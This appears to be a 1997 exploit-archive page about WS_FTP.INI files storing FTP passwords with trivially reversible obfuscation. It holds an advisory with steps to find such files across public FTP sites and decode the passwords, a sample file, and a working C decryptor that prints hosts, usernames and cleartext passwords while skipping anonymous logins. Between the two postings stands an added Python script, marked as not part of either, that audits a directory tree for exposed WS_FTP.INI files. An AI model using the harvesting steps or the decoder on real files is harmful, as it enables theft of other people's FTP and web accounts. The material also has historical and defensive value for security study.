Trivial "encryption" (obfuscation) in ws_ftp.ini
Description: WS_FTP offers the facility for morons to store their ftp password to remote systems. It keeps this information in ws_ftp.ini in obfuscated form which is easy to decode. Additionally, some idiots have their ws_ftp.ini (including passwords) available on public internet ftp sites.
Author: Milosch Meriac <anotherPI@studbox.uni-stuttgart.de>
Compromise: Obtain cleartext passwords from ws_ftp.ini files
Vulnerable Systems: People who save passwords w/ws_ftp and keep the .ini file where it is accessible to others.
Date: 9 August 1997
Notes: I have appended a simple program to "decrypt" the ini file.
Date: Sat, 09 Aug 1997 12:59:27 +0200
From: Milosch Meriac <anotherPI@studbox.uni-stuttgart.de>
To: best-of-security@cyber.com.au
Subject: BoS: WS_FTP.INI Security hole.
hi,
i have discovered the following bug/security hole:
Step 1.: find some WS_FTP.INI files Worldwide using
http://ftpsearch.ntnu.no/ftpsearch?query=ws_ftp.ini&doit=Search&type=Case+insensitive+substring+search&hits=5000&matches=&hitsprmatch=&limdom=&limpath=&f1=Count&f2=Mode&f3=Size&f4=Date&f5=Host&f6=Path&header=none&sort=date&trlen=20
(sorted by Date & Size)
Step 2.: approximately 30% of these Files contain encrypted
Passwords for WWW/FTP servers plus Usernames & Hosts;
---->75% of these Passwords are valid !!!
example: Content of a WS_FTP.INI-file:
[Gate]
HOST=ftp.gate.net
UID=ftp
PWD=616F71717D727B7A48
LOCDIR=D:\
DIR=/
(PWD=<encrypted Password stands here>)
Step 3.: decrypt Passwords:
The Encryption Method used in WS_FTP is _extremely_ weak ! the Password
is converted (ASCII conforming) to Hex-Numbers (2 Digits)... if a Digit
is at position N , then N is added to this Digit ---> that's all !
(The password mentioned in the above example is anonymus@)
How To Check if you are vulnerable:
Scan your whole Website for the File "WS_FTP.INI" and ensure that this
File is Locked for all Users except the Owner !
Seldom this also works with
- EUDORA.INI
- PMAIL.INI (Pegasus Mail)
- prefs.js (Netscape)
- other INI/etc.-files
_All_ files/programs mentioned above have _extremely_weak_ encryption-schemes...
please check your Website !
-milosch meriac
---------
HomePage: http://wwwcip.rus.uni-stuttgart.de/~tky20848/
PGP: http://wwwcip.rus.uni-stuttgart.de/~tky20848/PGP/anotherpi.key
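The check from the "How To Check" paragraph of the mail above, as an added example that is not part of either posting: it walks a directory tree, finds WS_FTP.INI in any letter case, and reports whether group/other can read it and whether a PWD= value is stored. The function names and the sample tree are assumptions made for this example.

```python
import os
import stat
import tempfile

def has_stored_password(path):
    """True if the file has a PWD= entry with a value (the field shown in the advisory)."""
    try:
        with open(path, "r", errors="replace") as fh:
            lines = fh.read().splitlines()
    except OSError:
        return False  # unreadable to the auditing user: not confirmed
    return any(k.strip().upper() == "PWD" and v.strip()
               for k, sep, v in (ln.partition("=") for ln in lines) if sep)

def audit(root):
    """Find every WS_FTP.INI under root (any letter case) and report its exposure."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() != "ws_ftp.ini":
                continue
            path = os.path.join(dirpath, name)
            # lstat: a symlink is reported with the link's own mode
            mode = stat.S_IMODE(os.lstat(path).st_mode)
            findings.append({
                "path": path,
                "mode": oct(mode),
                "readable_by_others": bool(mode & (stat.S_IRGRP | stat.S_IROTH)),
                "stored_password": has_stored_password(path),
            })
    return findings

def demo():
    """Audit a constructed tree (sample data made up for this example)."""
    samples = {
        os.path.join("pub", "WS_FTP.INI"): ("[Site]\nHOST=ftp.example.org\nUID=alice\nPWD=0123\n", 0o644),
        os.path.join("home", "ws_ftp.ini"): ("[Site]\nHOST=ftp.example.org\nUID=alice\nPWD=\n", 0o600),
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, (text, mode) in samples.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path))
            with open(path, "w") as fh:
                fh.write(text)
            os.chmod(path, mode)
        return sorted((os.path.relpath(f["path"], root), f["readable_by_others"],
                       f["stored_password"]) for f in audit(root))

if __name__ == "__main__":
    print(demo())
```

Mode bits only protect the file when the FTP or web server runs as a user other than the file's owner; a WS_FTP.INI found inside a published tree is better deleted than re-permissioned.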
Date: Mon, 11 Aug 1997 06:02:13 +0700
From: JeBe <jebe@STUDENTS.ITB.AC.ID>
To: BUGTRAQ@NETSPACE.ORG
Subject: Program To decrypt password in ws_ftp.ini
/* This Program is freely distributed as long you not removed
this comment.
It's used to decrypt password on ini file, specially on ws_ftp.ini
Written by
JeBe Budianto, Electrical Engineering ITB
E-Mail: jebe@students.itb.ac.id
jebe@EE.ITB.ac.id
Tested on FreeBSD 2.1.5
*/
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char password[100];

/* Value of one hex digit (0-15); any other character counts as 0. */
static int hexval(char c)
{
    if (isdigit((unsigned char)c))
        return c - '0';
    c = (char)tolower((unsigned char)c);
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : 0;
}

/* Decode the "PWD=" line held in password[]: every two hex digits are one
   character that had its position (0, 1, 2, ...) added to it. */
void extract(void)
{
    int h = 0, i = 4, k;

    if (password[i] == 'V')    /* skip a leading 'V' if present */
        i = 5;
    /* stop at end of line or end of string; two digits are needed per character */
    while (password[i] != '\r' && password[i] != '\n' &&
           password[i] != '\0' && password[i + 1] != '\0')
    {
        k = hexval(password[i]) * 16 + hexval(password[i + 1]) - h;
        i += 2;
        h++;
        printf("%c", k);
    }
    printf("\n");
}

int main(int argc, char **argv)
{
    FILE *fp;
    int complete = 0;
    char buff01[100], host[100] = "", nama[100] = "", namafile[100];

    printf("==============================================\n");
    printf("| Syntax: ProgramName IniFileName |\n");
    printf("| Written by jebe@students.itb.ac.id |\n");
    printf("==============================================\n");
    if (argc == 1)
    {
        printf("Use default ini file WS_FTP.INI\n");
        strcpy(namafile, "WS_FTP.INI");
    }
    else
    {
        /* bounded copy: argv[1] may be longer than namafile */
        snprintf(namafile, sizeof(namafile), "%s", argv[1]);
    }
    fp = fopen(namafile, "r");
    if (fp == NULL)
    {
        printf("There's no ini file\n");
        return 1;
    }
    while (fgets(buff01, sizeof(buff01), fp) != NULL)
    {
        if (strncmp(buff01, "HOST", 4) == 0)
        {
            strcpy(host, buff01);
            complete = 1;
        }
        if (strncmp(buff01, "UID", 3) == 0)
        {
            strcpy(nama, buff01);
            complete++;
        }
        if (strncmp(buff01, "PWD", 3) == 0)
        {
            strcpy(password, buff01);
            complete++;
        }
        if (complete == 3)
        {
            /* entries whose UID starts with "ftp" or "anonymous" are skipped */
            if (strncmp(nama + 4, "ftp", 3) != 0 &&
                strncmp(nama + 4, "anonymous", 9) != 0)
            {
                printf("%s", host);
                printf("%s", nama);
                printf("Password = ");
                extract();
            }
            complete = 0;    /* entry handled; wait for the next HOST line */
        }
    }
    fclose(fp);
    return 0;
}
This page is part of Fyodor's exploit
world.